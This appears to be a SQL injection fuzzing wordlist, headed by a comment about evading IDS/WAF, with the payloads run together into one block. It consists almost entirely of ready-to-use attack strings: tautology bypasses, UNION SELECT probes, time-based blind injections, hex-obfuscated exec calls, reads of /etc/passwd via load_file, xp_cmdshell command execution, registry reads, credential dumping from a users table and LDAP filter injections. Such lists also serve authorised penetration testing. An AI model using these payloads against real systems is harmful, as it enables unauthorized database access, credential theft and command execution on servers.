# to attempt with ids/waf evasion try like # /index.aspx?page=select 1&page=2,3 from table where id=1 <>"'%;)(&+ | ! ? / // //* ' ' -- ( ) *| */* & 0 031003000270000 0 or 1=1 0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q) 0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A 0x77616974666F722064656C61792027303A303A31302700 exec(@s) 1;(load_file(char(47,101,116,99,47,112,97,115,115,119,100))),1,1,1; 1 or 1=1 1;SELECT%20* 1 waitfor delay '0:0:10'-- '%20or%20''=' '%20or%201=1 ')%20or%20('x'='x '%20or%20'x'='x %20or%20x=x %20'sleep%2050' %20$(sleep%2050) %21 23 OR 1=1 %26 %27%20or%201=1 %28 %29 %2A%28%7C%28mail%3D%2A%29%29 %2A%28%7C%28objectclass%3D%2A%29%29 %2A%7C ||6 '||'6 (||6) %7C a' admin' or ' ' and 1=( if((load_file(char(110,46,101,120,116))<>char(39,39)),1,0)); ' and 1 in (select var from temp)-- anything' OR 'x'='x "a"" or 1=1--" a' or 1=1-- "a"" or 3=3--" a' or 3=3-- a' or 'a' = 'a '%20OR as asc a' waitfor delay '0:0:10'-- '; begin declare @var varchar(8000) set @var=':' select @var=@var+'+login+'/'+password+' ' from users where login > bfilename char%4039%41%2b%40SELECT declare @q nvarchar (200) 0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q) declare @q nvarchar (200) select @q = 0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A0031003000270000 exec(@q) declare @q nvarchar (4000) select @q = declare @s varchar (200) select @s = 0x73656c65637420404076657273696f6e exec(@s) declare @s varchar(200) select @s = 0x77616974666F722064656C61792027303A303A31302700 exec(@s) declare @s varchar(22) select @s = declare @s varchar (8000) select @s = 0x73656c65637420404076657273696f6e delete desc distinct '||(elt(-3+5,bin(15),ord(10),hex(char(45)))) '; exec master..xp_cmdshell '; exec master..xp_cmdshell 'ping 172.10.1.255'-- exec(@s) '; exec ('sel' + 'ect us' + 'er') exec sp '; execute immediate 'sel' || 'ect us' || 'er' exec xp '; exec xp_regread ' group by userid having 1=1-- handler having ' having 1=1-- hi or 1=1 --" hi' or 1=1 -- "hi"") or (""a""=""a" hi or a=a hi' or 'a'='a hi') or ('a'='a 'hi' or 'x'='x'; insert like limit *(|(mail=*)) *(|(objectclass=*)) or ' or ''=' or 0=0 #" ' or 0=0 -- ' or 0=0 # " or 0=0 -- or 0=0 -- or 0=0 # ' or 1 --' ' or 1/* ; or '1'='1' ' or '1'='1 ' or '1'='1'-- ' or 1=1 ' or 1=1 /* ' or 1=1-- ' or 1=1-- '/**/or/**/1/**/=/**/1 ‘ or 1=1 -- " or 1=1-- or 1=1 or 1=1-- or 1=1 or ""= ' or 1=1 or ''=' ' or 1 in (select @@version)-- or%201=1 or%201=1 -- ' or 2 > 1 ' or 2 between 1 and 3 ' or 3=3 ‘ or 3=3 -- ' or '7659'='7659 or a=a or a = a ' or 'a'='a ' or a=a-- ') or ('a'='a " or "a"="a ) or (a=a order by ' or (EXISTS) or isNULL(1/0) /* " or isNULL(1/0) /* ' or 'something' like 'some%' ' or 'something' = 'some'+'thing' ' or 'text' = n'text' ' or 'text' > 't' ' or uid like '% ' or uname like '% ' or 'unusual' = 'unusual' ' or userid like '% ' or user like '% ' or username like '% ' or username like char(37); ' or 'whatever' in ('whatever') ' -- &password= password:*/=1-- PRINT PRINT @@variable procedure replace select ' select * from information_schema.tables-- ' select name from syscolumns where id = (select id from sysobjects where name = tablename')-- ' (select top 1 --sp_password 'sqlattempt1 (sqlattempt2) 'sqlvuln '+sqlvuln (sqlvuln) sqlvuln; t'exec master..xp_cmdshell 'nslookup www.google.com'-- to_timestamp_tz truncate tz_offset ' UNION ALL SELECT ' union all select @@version-- ' union select uni/**/on sel/**/ect ' UNION SELECT ' union select 1,load_file('/etc/passwd'),1,1,1; ) union select * from information_schema.tables; ' union select * from users where login = char(114,111,111,116); update '||UTL_HTTP.REQUEST ,@variable @variable @var select @var as var into temp end -- \x27UNION SELECT x' AND 1=(SELECT COUNT(*) FROM tabname); -- x' AND email IS NULL; -- x' AND members.email IS NULL; -- x' AND userid IS NULL; -- x' or 1=1 or 'x'='y x' OR full_name LIKE '%Bob% ý or 1=1 --